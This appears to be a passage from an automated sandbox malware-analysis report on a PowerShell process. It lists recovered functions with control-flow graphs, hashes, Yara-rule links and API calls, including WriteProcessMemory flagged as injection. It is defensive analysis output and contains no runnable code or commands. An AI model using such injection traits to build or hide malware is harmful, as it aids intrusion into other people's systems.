                                                                                              • Opcode Fuzzy Hash: aa8c37e38c61b9a936eb9075013e9930f96bed979151ff6b06583a49fc5b80b3
                                                                                              • Instruction Fuzzy Hash: 6DD1F8B5A10219EFDB14CF98D484A9DBBF2FF88310F148559E819AB352C775EE81CB90
                                                                                              Function 072333C0 Relevance: 1.7, APIs: 1, Instructions: 222COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 582 72333c0-72333f2 583 7233499-72334a7 582->583 584 72333f8-723340e 582->584 589 72334a8-72334c0 583->589 585 7233413-7233426 584->585 586 7233410 584->586 585->583 590 7233428-7233435 585->590 586->585 597 72334c2-7233507 589->597 591 7233437 590->591 592 723343a-723344c 590->592 591->592 592->583 596 723344e-7233458 592->596 598 7233466-7233498 596->598 599 723345a-723345c 596->599 606 7233509-7233520 597->606 599->598 608 7233522-7233531 606->608 610 7233c58-7233c59 608->610 611 7233c22-7233c53 610->611 612 7233c5b-7233c89 610->612 611->610 614 7233c8b-7233c97 612->614 615 7233c99-7233cd2 WriteProcessMemory 612->615 614->615 616 7233cd4-7233cda 615->616 617 7233cdb-7233cef 615->617 616->617
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2509396665.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7230000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 397fab8b38962cbb5a7d3b6b66cc04f2716247d50ba7e66c39d5b685461c7a2a
                                                                                              • Instruction ID: 40d198745aca1bad3906d764ccb32185058da6f007099a31c823384ab3ebf67e
                                                                                              • Opcode Fuzzy Hash: 397fab8b38962cbb5a7d3b6b66cc04f2716247d50ba7e66c39d5b685461c7a2a
                                                                                              • Instruction Fuzzy Hash: DA81BEB19093859FCB02CF6CC890ADEBFB0FF4A310F15459AD594EB292C734A945CBA5
                                                                                              Function 078A6428 Relevance: 1.7, Strings: 1, Instructions: 448COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 619 78a6428-78a644a 620 78a65ef-78a65fa 619->620 621 78a6450-78a6455 619->621 629 78a65fc-78a6602 620->629 630 78a6603-78a6629 620->630 622 78a646d-78a6471 621->622 623 78a6457-78a645d 621->623 626 78a6597-78a65a1 622->626 627 78a6477-78a647b 622->627 624 78a645f 623->624 625 78a6461-78a646b 623->625 624->622 625->622 631 78a65af-78a65b5 626->631 632 78a65a3-78a65ac 626->632 633 78a64bb 627->633 634 78a647d-78a648e 627->634 629->630 643 78a662b 630->643 644 78a6630-78a6637 630->644 637 78a65bb-78a65c7 631->637 638 78a65b7-78a65b9 631->638 635 78a64bd-78a64bf 633->635 634->620 646 78a6494-78a6499 634->646 635->626 642 78a64c5-78a64c9 635->642 640 78a65c9-78a65ec 637->640 638->640 642->626 647 78a64cf-78a64d3 642->647 643->644 650 78a6639 644->650 651 78a663e-78a6689 644->651 648 78a649b-78a64a1 646->648 649 78a64b1-78a64b9 646->649 647->626 653 78a64d9-78a64fa 647->653 654 78a64a3 648->654 655 78a64a5-78a64af 648->655 649->635 650->651 660 78a668b 651->660 661 78a6690-78a6697 651->661 653->626 665 78a6500-78a6504 653->665 654->649 655->649 660->661 663 78a6699 661->663 664 78a669e-78a66ee 661->664 663->664 671 78a66f0 664->671 672 78a66f5-78a66fc 664->672 666 78a6506-78a650f 665->666 667 78a6527 665->667 669 78a6511-78a6514 666->669 670 78a6516-78a6523 666->670 673 78a652a-78a6537 667->673 676 78a6525 669->676 670->676 671->672 674 78a66fe 672->674 675 78a6703-78a6751 672->675 677 78a653d-78a6594 673->677 674->675 681 78a6758-78a675f 675->681 682 78a6753 675->682 676->673 683 78a6761 681->683 684 78a6766-78a67b1 681->684 682->681 683->684 686 78a67b8-78a67bf 684->686 687 78a67b3 684->687 688 78a67c1 686->688 689 78a67c6-78a6811 686->689 687->686 688->689 692 78a6818-78a681f 689->692 693 78a6813 689->693 694 78a6821 692->694 695 78a6826-78a684a 692->695 693->692 694->695 697 78a684c-78a685f 695->697 698 78a6862-78a6871 695->698 697->698 699 78a6878-78a687f 698->699 700 78a6873 698->700 701 78a6881 699->701 702 78a6886-78a68d6 699->702 700->699 701->702 704 78a68d8 702->704 705 78a68dd-78a68e4 702->705 704->705 706 78a68eb-78a6940 705->706 707 78a68e6 705->707 707->706
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519178972.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_78a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0lqr
                                                                                              • API String ID: 0-411913566
                                                                                              • Opcode ID: 6603a87e2924cfb4da79bf1de9eed92d6f5b66c9192e1f4790d83453d0180000
                                                                                              • Instruction ID: 57d27c3ef9d3570d12b7508279b7ba1601f8f5faf5207272e725c18c59cff95b
                                                                                              • Opcode Fuzzy Hash: 6603a87e2924cfb4da79bf1de9eed92d6f5b66c9192e1f4790d83453d0180000
                                                                                              • Instruction Fuzzy Hash: B8F121B1605389AFEB16CF74CC58BAA7F75EF52304F18429AE114CB2E6D7B49840CB61
                                                                                              Function 072334A4 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 710 72334a4-72334a6 711 72334a8-72334c0 710->711 714 72334c2-7233507 711->714 719 7233509-7233520 714->719 721 7233522-7233531 719->721 723 7233c58-7233c59 721->723 724 7233c22-7233c53 723->724 725 7233c5b-7233c89 723->725 724->723 727 7233c8b-7233c97 725->727 728 7233c99-7233cd2 WriteProcessMemory 725->728 727->728 729 7233cd4-7233cda 728->729 730 7233cdb-7233cef 728->730 729->730
                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07233CC5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2509396665.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7230000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              • Opcode ID: 8741d97ef6174d45df4bef53789e6ecf495ec189f36d138f5837d3a19a77eee7
                                                                                              • Instruction ID: d9a0a4df1bb27538caab591ce927c1af119090b954c7ad0c19b436598517d025
                                                                                              • Opcode Fuzzy Hash: 8741d97ef6174d45df4bef53789e6ecf495ec189f36d138f5837d3a19a77eee7
                                                                                              • Instruction Fuzzy Hash: FD418CB281E3D59FCB07DB68C8606D97FB0AF47210F0944CBD194DB1A3D6384918CBAA
                                                                                              Function 0723F0FC Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 732 723f0fc-723f814 DuplicateHandle 734 723f816-723f81c 732->734 735 723f81d-723f83a 732->735 734->735
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(00000000,00000000,0721E238,?,00000000,0723ED2C,00000000,?,?,?,00000000,?,?), ref: 0723F807
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2509396665.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7230000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: 678d56f7a56891de9c0c26d0c76e37ffff4e4e39b92d8ead9f64c98b71542990
                                                                                              • Instruction ID: 905cfbee13bc7e63e2225807bc98c74cd3315e2896ce67345674d9805afdb7bf
                                                                                              • Opcode Fuzzy Hash: 678d56f7a56891de9c0c26d0c76e37ffff4e4e39b92d8ead9f64c98b71542990
                                                                                              • Instruction Fuzzy Hash: EA21D4B5D10349EFDB10CF9AD584ADEBBF4EB48320F14841AE914A7310D774A950CFA5
                                                                                              Function 07233C38 Relevance: 1.6, APIs: 1, Instructions: 61injectionCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 738 7233c38-7233c89 740 7233c8b-7233c97 738->740 741 7233c99-7233cd2 WriteProcessMemory 738->741 740->741 742 7233cd4-7233cda 741->742 743 7233cdb-7233cef 741->743 742->743
                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07233CC5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2509396665.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7230000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              • Opcode ID: 46d9a92c5762a477e266243a61b9a72389a512c16658ca4371d38f9e720dd570
                                                                                              • Instruction ID: 99bcfdc6dfb02ecab1429a19142557279216456355493fcd47a0c11f00400b2c
                                                                                              • Opcode Fuzzy Hash: 46d9a92c5762a477e266243a61b9a72389a512c16658ca4371d38f9e720dd570
                                                                                              • Instruction Fuzzy Hash: 0121EFB5900349DFCB10CF9AD984BDEBBF4FB48320F10882AE918A7250D774A950CBA4
                                                                                              Function 07934BE8 Relevance: 1.6, Instructions: 1558COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519750612.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7930000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d5dfe0c2ce1b67a8ee136d144677de76a6125def79ba7ece6e91fcc8cfde3178
                                                                                              • Instruction ID: f1f64177e635011eb08ab26d98f4c6bb02ed7a5cbbae6d855054c173b17a56b3
                                                                                              • Opcode Fuzzy Hash: d5dfe0c2ce1b67a8ee136d144677de76a6125def79ba7ece6e91fcc8cfde3178
                                                                                              • Instruction Fuzzy Hash: ECB228B1B00246CFDB14CF78D84466ABBFAEFC9218F26846AD405CB251DB71DD61CBA1
                                                                                              Function 07232CF0 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1225 7232cf0-7232d64 GetSystemInfo 1227 7232d66 1225->1227 1228 7232d6b-7232d7f 1225->1228 1227->1228
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2509396665.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7230000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoSystem
                                                                                              • String ID:
                                                                                              • API String ID: 31276548-0
                                                                                              • Opcode ID: 41524746aae9519e9680682537ede04722f3653945109f8a96cdd47e2b3c23cb
                                                                                              • Instruction ID: 0e14049322ae6cabe86803b2c40785e2a06a3bbf04db2763eb01bee2d45ec8f6
                                                                                              • Opcode Fuzzy Hash: 41524746aae9519e9680682537ede04722f3653945109f8a96cdd47e2b3c23cb
                                                                                              • Instruction Fuzzy Hash: 3511DFB2C0065ADBCB10CF9AD544B9EFBF4FB88624F10815AD518B7210D7B46954CFA5
                                                                                              Function 078A4DA8 Relevance: 1.5, Instructions: 1471COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519178972.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_78a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 33969665267cb92f79ec5d31c8fa7494275095b3e3065c564e62fcf2a063244b
                                                                                              • Instruction ID: 6ca0146950eb25d517cc9a42a675db326c85259c2c8b05b8f818ab47724f819a
                                                                                              • Opcode Fuzzy Hash: 33969665267cb92f79ec5d31c8fa7494275095b3e3065c564e62fcf2a063244b
                                                                                              • Instruction Fuzzy Hash: F4B219B0B0020AEFEB14CF68C444A6EBBE6AFD5324F148069D905DB355DB71DDA1CBA1
                                                                                              Function 085E616E Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1678 85e616e-85e617f call 85eec50 1679 85e6185-85e6192 1678->1679 1680 85e5c5b-85e5c7a 1679->1680 1681 85e6198-85e61c1 1679->1681 1680->1678 1684 85e61c7-85e61d2 1681->1684 1685 85e1f61-85e1f6c 1681->1685 1684->1685 1686 85e1f6e-85e89d8 1685->1686 1687 85e1f75-85e976d 1685->1687 1692 85e89df-85e8a11 1686->1692 1693 85e89da 1686->1693 1690 85e976f 1687->1690 1691 85e9774-85e9790 1687->1691 1690->1691 1694 85e9797-85e97ca 1691->1694 1695 85e9792 1691->1695 1692->1685 1699 85e8a17-85e8a22 1692->1699 1693->1692 1694->1685 1698 85e97d0-85e97db 1694->1698 1695->1694 1698->1685 1699->1685
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2522895077.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_85e0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: <
                                                                                              • API String ID: 0-4251816714
                                                                                              • Opcode ID: 93ee22b4cb57e232d9251a671ce9f50c35e6a46f2ab12f2a0b06df9a1349a9ef
                                                                                              • Instruction ID: 59d028406f049bb645d392808b026a00714a3c85882e3b4f75f27a2a3b6f36d1
                                                                                              • Opcode Fuzzy Hash: 93ee22b4cb57e232d9251a671ce9f50c35e6a46f2ab12f2a0b06df9a1349a9ef
                                                                                              • Instruction Fuzzy Hash: 71011E74D45218CFDB24DF60DD48B98B7B1BB49302F0084DAE50DB3640D7784A84CF65
                                                                                              Function 078AE42F Relevance: 1.2, Instructions: 1230COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1701 78ae42f-78ae442 1702 78ae448-78ae4cc 1701->1702 1703 78aeeb4-78aeefd 1701->1703 1714 78ae4fb-78ae578 1702->1714 1715 78ae4ce-78ae4f3 1702->1715 1717 78ada7e-78adaa2 1703->1717 1718 78ada77 1703->1718 1738 78ae57a-78ae59f 1714->1738 1739 78ae5a7-78ae5b4 1714->1739 1715->1714 1721 78adad1-78adb31 1717->1721 1722 78adaa4-78adac9 1717->1722 1718->1717 1720 78adb38-78adb5c 1718->1720 1724 78adb8b-78adb98 1720->1724 1725 78adb5e-78adb83 1720->1725 1721->1720 1722->1721 1724->1703 1727 78adb9e-78adbcc 1724->1727 1725->1724 1727->1703 1734 78adbd2-78adc00 1727->1734 1734->1703 1742 78adc06-78adc34 1734->1742 1738->1739 1739->1703 1741 78ae5ba-78ae608 1739->1741 1741->1703 1751 78ae60e-78ae62a 1741->1751 1742->1703 1746 78adc3a-78add17 1742->1746 1765 78adfdd-78ae001 1746->1765 1766 78add1d-78add37 1746->1766 1751->1703 1754 78ae630-78ae66d 1751->1754 1754->1703 1759 78ae673-78ae6b1 1754->1759 1759->1703 1767 78ae6b7-78ae77e 1759->1767 1770 78ae003-78ae028 1765->1770 1771 78ae030-78ae146 1765->1771 1768 78add39-78add5e 1766->1768 1769 78add66-78add73 1766->1769 1767->1703 1797 78ae784-78ae7d4 1767->1797 1768->1769 1772 78add79-78addbd 1769->1772 1773 78adf94-78adfd8 1769->1773 1770->1771 1815 78ae3a9-78ae3d7 1771->1815 1816 78ae14c-78ae166 1771->1816 1772->1773 1786 78addc3-78adde3 1772->1786 1773->1765 1786->1773 1791 78adde9-78ade1c 1786->1791 1791->1773 1800 78ade22-78ade82 1791->1800 1797->1703 1809 78ae7da-78ae836 1797->1809 1800->1773 1812 78ade88-78adf36 1800->1812 1826 78ae83b-78ae882 1809->1826 1812->1773 1841 78adf38-78adf92 1812->1841 1840 78ae3dc-78ae42c 1815->1840 1823 78ae168-78ae174 1816->1823 1824 78ae190 1816->1824 1828 78ae17e-78ae184 1823->1828 1829 78ae176-78ae17c 1823->1829 1830 78ae196-78ae1e4 1824->1830 1836 78ae8b1-78ae8e6 1826->1836 1837 78ae884-78ae8a9 1826->1837 1831 78ae18e 1828->1831 1829->1831 1830->1815 1847 78ae1ea-78ae1ff 1830->1847 1831->1830 1836->1703 1846 78ae8ec-78ae910 1836->1846 1837->1836 1840->1703 1841->1765 1846->1703 1854 78ae916-78ae972 1846->1854 1855 78ae219-78ae24e 1847->1855 1856 78ae201-78ae207 1847->1856 1874 78ae997-78ae99d 1854->1874 1875 78ae974-78ae989 1854->1875 1855->1815 1867 78ae254-78ae274 1855->1867 1859 78ae20b-78ae217 1856->1859 1860 78ae209 1856->1860 1859->1855 1860->1855 1867->1815 1871 78ae27a-78ae35e 1867->1871 1871->1815 1900 78ae360-78ae3a7 1871->1900 1876 78ae9a3-78ae9ea 1874->1876 1875->1876 1880 78aea19-78aea26 1876->1880 1881 78ae9ec-78aea11 1876->1881 1880->1703 1883 78aea2c-78aea5a 1880->1883 1881->1880 1883->1703 1888 78aea60-78aea8e 1883->1888 1888->1703 1891 78aea94-78aeac2 1888->1891 1891->1703 1895 78aeac8-78aeba5 1891->1895 1911 78aebab-78aebc5 1895->1911 1912 78aef02-78af00a 1895->1912 1900->1840 1913 78aebc7-78aebec 1911->1913 1914 78aebf4-78aec01 1911->1914 1920 78af039-78af06e 1912->1920 1921 78af00c-78af031 1912->1921 1913->1914 1916 78aee69-78aeeb2 1914->1916 1917 78aec07-78aec4b 1914->1917 1916->1703 1916->1912 1917->1916 1930 78aec51-78aec71 1917->1930 1928 78af159-78af19d 1920->1928 1929 78af074-78af0a2 1920->1929 1921->1920 1948 78af1a2 1928->1948 1929->1928 1934 78af0a8-78af11a 1929->1934 1930->1916 1938 78aec77-78aecaa 1930->1938 1953 78af148-78af14e 1934->1953 1954 78af11c-78af137 1934->1954 1938->1916 1946 78aecb0-78aed10 1938->1946 1946->1916 1956 78aed16-78aed76 1946->1956 1948->1948 1953->1928 1956->1916 1961 78aed7c-78aee05 1956->1961 1961->1916 1966 78aee07-78aee64 1961->1966 1966->1912
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519178972.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_78a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0325ff0cdae1063d5b0f20abb50e9f222ed4d65165238c678be4f0aadc1fae03
                                                                                              • Instruction ID: 03949f4daee706566195cdb19a1ddb05ad2af72011a0cf9d3e2e7099573d54d4
                                                                                              • Opcode Fuzzy Hash: 0325ff0cdae1063d5b0f20abb50e9f222ed4d65165238c678be4f0aadc1fae03
                                                                                              • Instruction Fuzzy Hash: 00C254B4A00215DFE714CB18C950BA9BBB2EF89704F54C1E9DA09AB351CB71ED82CF95
                                                                                              Function 0793D548 Relevance: .7, Instructions: 746COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519750612.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7930000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b168acf01c094f2bd810e440700e5413b84008e2bb2f24bccf353b3e302e3c66
                                                                                              • Instruction ID: 290714ff6a77ac61d0de3eeb251ff07434e92d48072175cc57eadc9f28d58938
                                                                                              • Opcode Fuzzy Hash: b168acf01c094f2bd810e440700e5413b84008e2bb2f24bccf353b3e302e3c66
                                                                                              • Instruction Fuzzy Hash: 5E4248B1B00206DFDB148F68D8206AABBEAEFC5319F14C4BAD519CB391DB71D941C7A1
                                                                                              Function 07939B28 Relevance: .6, Instructions: 636COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519750612.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7930000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b2c06361a519dfeb41d37eb7521a4a3d6b195182dc9cfdbd1d13d44f171da41d
                                                                                              • Instruction ID: 9d30760869518fd9b6d0ba6880961b982a337dfe853d2d1ca5a7ef0a14dfb1d1
                                                                                              • Opcode Fuzzy Hash: b2c06361a519dfeb41d37eb7521a4a3d6b195182dc9cfdbd1d13d44f171da41d
                                                                                              • Instruction Fuzzy Hash: CE2204B1B04206CFDB148B69C444B6ABBEAEFC622CF14C46AE559DF251DBB1EC01C791
                                                                                              Function 0793914A Relevance: .5, Instructions: 518COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2882 793914a-793916a 2885 793916d-7939179 2882->2885 2886 7939182-79391a3 2885->2886 2887 793917b 2885->2887 2888 79391d2-79391df 2886->2888 2889 79391a5-79391ca 2886->2889 2887->2886 2890 79394c2-79394e3 2887->2890 2891 7939378-7939399 2887->2891 2896 79391e5-793920c 2888->2896 2897 79397bc-79397f9 2888->2897 2889->2888 2892 7939512-793951f 2890->2892 2893 79394e5-793950a 2890->2893 2894 793939b-79393c0 2891->2894 2895 79393c8-79393fa 2891->2895 2892->2897 2899 7939525-793952a 2892->2899 2893->2892 2894->2895 2895->2897 2910 7939400-7939421 2895->2910 2896->2897 2909 7939212-7939237 2896->2909 2897->2885 2903 7939542-7939554 2899->2903 2904 793952c-7939532 2899->2904 2903->2897 2911 793955a-7939565 2903->2911 2907 7939536-7939540 2904->2907 2908 7939534 2904->2908 2907->2903 2908->2903 2909->2897 2922 793923d-793929f 2909->2922 2910->2897 2923 7939427-7939480 2910->2923 2913 7939567-793956d 2911->2913 2914 793957d-79395ba 2911->2914 2918 7939571-793957b 2913->2918 2919 793956f 2913->2919 2914->2897 2925 79395c0-79395c7 2914->2925 2918->2914 2919->2914 3018 79392a2 call 7936850 2922->3018 3019 79392a2 call 7936870 2922->3019 2950 7939482-7939494 2923->2950 2951 7939496-793949c 2923->2951 2927 79395c9-79395cf 2925->2927 2928 79395df-793960e 2925->2928 2931 79395d3-79395dd 2927->2931 2932 79395d1 2927->2932 3020 7939611 call 79365e1 2928->3020 3021 7939611 call 7936600 2928->3021 2931->2928 2932->2928 2938 7939613-7939637 2947 79397fe-79398a4 2938->2947 2948 793963d-7939657 2938->2948 2942 79392a4-79392b7 2942->2897 2944 79392bd-7939371 2942->2944 2944->2891 2960 79398d3-7939905 2947->2960 2961 79398a6-79398cb 2947->2961 2952 7939686-7939693 2948->2952 2953 7939659-793967e 2948->2953 2955 793949f-79394bb 2950->2955 2951->2955 2957 7939699-793969e 2952->2957 2958 793977d-79397ba 2952->2958 2953->2952 2955->2890 2963 79396a0-79396a6 2957->2963 2964 79396b6-79396c8 2957->2964 2958->2947 2975 79399c6-7939a07 2960->2975 2976 793990b-7939910 2960->2976 2961->2960 2970 79396aa-79396b4 2963->2970 2971 79396a8 2963->2971 2964->2958 2966 79396ce-79396d9 2964->2966 2973 79396f1-7939778 2966->2973 2974 79396db-79396e1 2966->2974 2970->2964 2971->2964 2973->2947 2978 79396e3 2974->2978 2979 79396e5-79396ef 2974->2979 3012 7939a0c 2975->3012 2980 7939912-7939918 2976->2980 2981 7939928-793993a 2976->2981 2978->2973 2979->2973 2985 793991a 2980->2985 2986 793991c-7939926 2980->2986 2981->2975 2988 7939940-7939947 2981->2988 2985->2981 2986->2981 2991 7939949-793994f 2988->2991 2992 793995f-79399ab 2988->2992 2997 7939953-793995d 2991->2997 2998 7939951 2991->2998 3015 79399c1 2992->3015 3016 79399ad-79399bc 2992->3016 2997->2992 2998->2992 3012->3012 3015->2975 3018->2942 3019->2942 3020->2938 3021->2938
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519750612.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7930000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8511ecbf1e8e0d099452993574949a5dd959fc8e3948d3e035a632dec04edfbe
                                                                                              • Instruction ID: 88d1046dc8b1a9ae3968c83044f0ce29592d892bab973536f8d137055679faf2
                                                                                              • Opcode Fuzzy Hash: 8511ecbf1e8e0d099452993574949a5dd959fc8e3948d3e035a632dec04edfbe
                                                                                              • Instruction Fuzzy Hash: 92325FB4B00214CFEB14CB58C854B59BBB6EF85718F54C099D90AAB391DB72ED82CF52
                                                                                              Function 078A2D55 Relevance: .5, Instructions: 487COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 3022 78a2d55-78a2d58 3023 78a2d5a-78a2d5c 3022->3023 3024 78a2d5e-78a2d6b 3022->3024 3023->3024 3025 78a2d6d-78a2ddf 3024->3025 3026 78a2de0-78a2dee 3024->3026 3025->3026 3029 78a2f8a-78a2fab 3026->3029 3030 78a2df4-78a2e0e 3026->3030 3034 78a2fda-78a3086 3029->3034 3035 78a2fad-78a2fd2 3029->3035 3032 78a2e3d-78a2e4a 3030->3032 3033 78a2e10-78a2e35 3030->3033 3036 78a2e50-78a2e71 3032->3036 3037 78a2f44-78a2f85 3032->3037 3033->3032 3062 78a348a-78a34b5 3034->3062 3063 78a308c-78a30cc 3034->3063 3035->3034 3036->3037 3044 78a2e77-78a2f42 3036->3044 3037->3029 3044->3029 3075 78a34ba-78a3507 3062->3075 3063->3062 3070 78a30d2-78a30f3 3063->3070 3073 78a310d-78a310f 3070->3073 3074 78a30f5-78a30fb 3070->3074 3076 78a3129-78a3151 3073->3076 3077 78a3111-78a3117 3073->3077 3078 78a30ff-78a310b 3074->3078 3079 78a30fd 3074->3079 3076->3062 3089 78a3157-78a3178 3076->3089 3081 78a311b-78a3127 3077->3081 3082 78a3119 3077->3082 3078->3073 3079->3073 3081->3076 3082->3076 3092 78a317a-78a3180 3089->3092 3093 78a3192-78a3194 3089->3093 3096 78a3182 3092->3096 3097 78a3184-78a3190 3092->3097 3094 78a31ae-78a31d9 3093->3094 3095 78a3196-78a319c 3093->3095 3094->3062 3104 78a31df-78a31e4 3094->3104 3098 78a319e 3095->3098 3099 78a31a0-78a31ac 3095->3099 3096->3093 3097->3093 3098->3094 3099->3094 3105 78a31fc-78a320f 3104->3105 3106 78a31e6-78a31ec 3104->3106 3105->3062 3107 78a3215-78a321a 3105->3107 3108 78a31ee 3106->3108 3109 78a31f0-78a31fa 3106->3109 3110 78a321c-78a3222 3107->3110 3111 78a3232-78a324a 3107->3111 3108->3105 3109->3105 3113 78a3226-78a3230 3110->3113 3114 78a3224 3110->3114 3111->3062 3115 78a3250-78a325b 3111->3115 3113->3111 3114->3111 3116 78a325d-78a3263 3115->3116 3117 78a3273-78a328b 3115->3117 3120 78a3267-78a3271 3116->3120 3121 78a3265 3116->3121 3117->3062 3118 78a3291-78a3298 3117->3118 3122 78a329a-78a32a0 3118->3122 3123 78a32b0-78a3305 3118->3123 3120->3117 3121->3117 3125 78a32a2 3122->3125 3126 78a32a4-78a32ae 3122->3126 3123->3062 3131 78a330b-78a3330 3123->3131 3125->3123 3126->3123 3131->3062 3133 78a3336-78a343d 3131->3133 3133->3062 3146 78a343f-78a345b 3133->3146 3148 78a3465-78a3488 3146->3148 3148->3075
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519178972.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_78a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
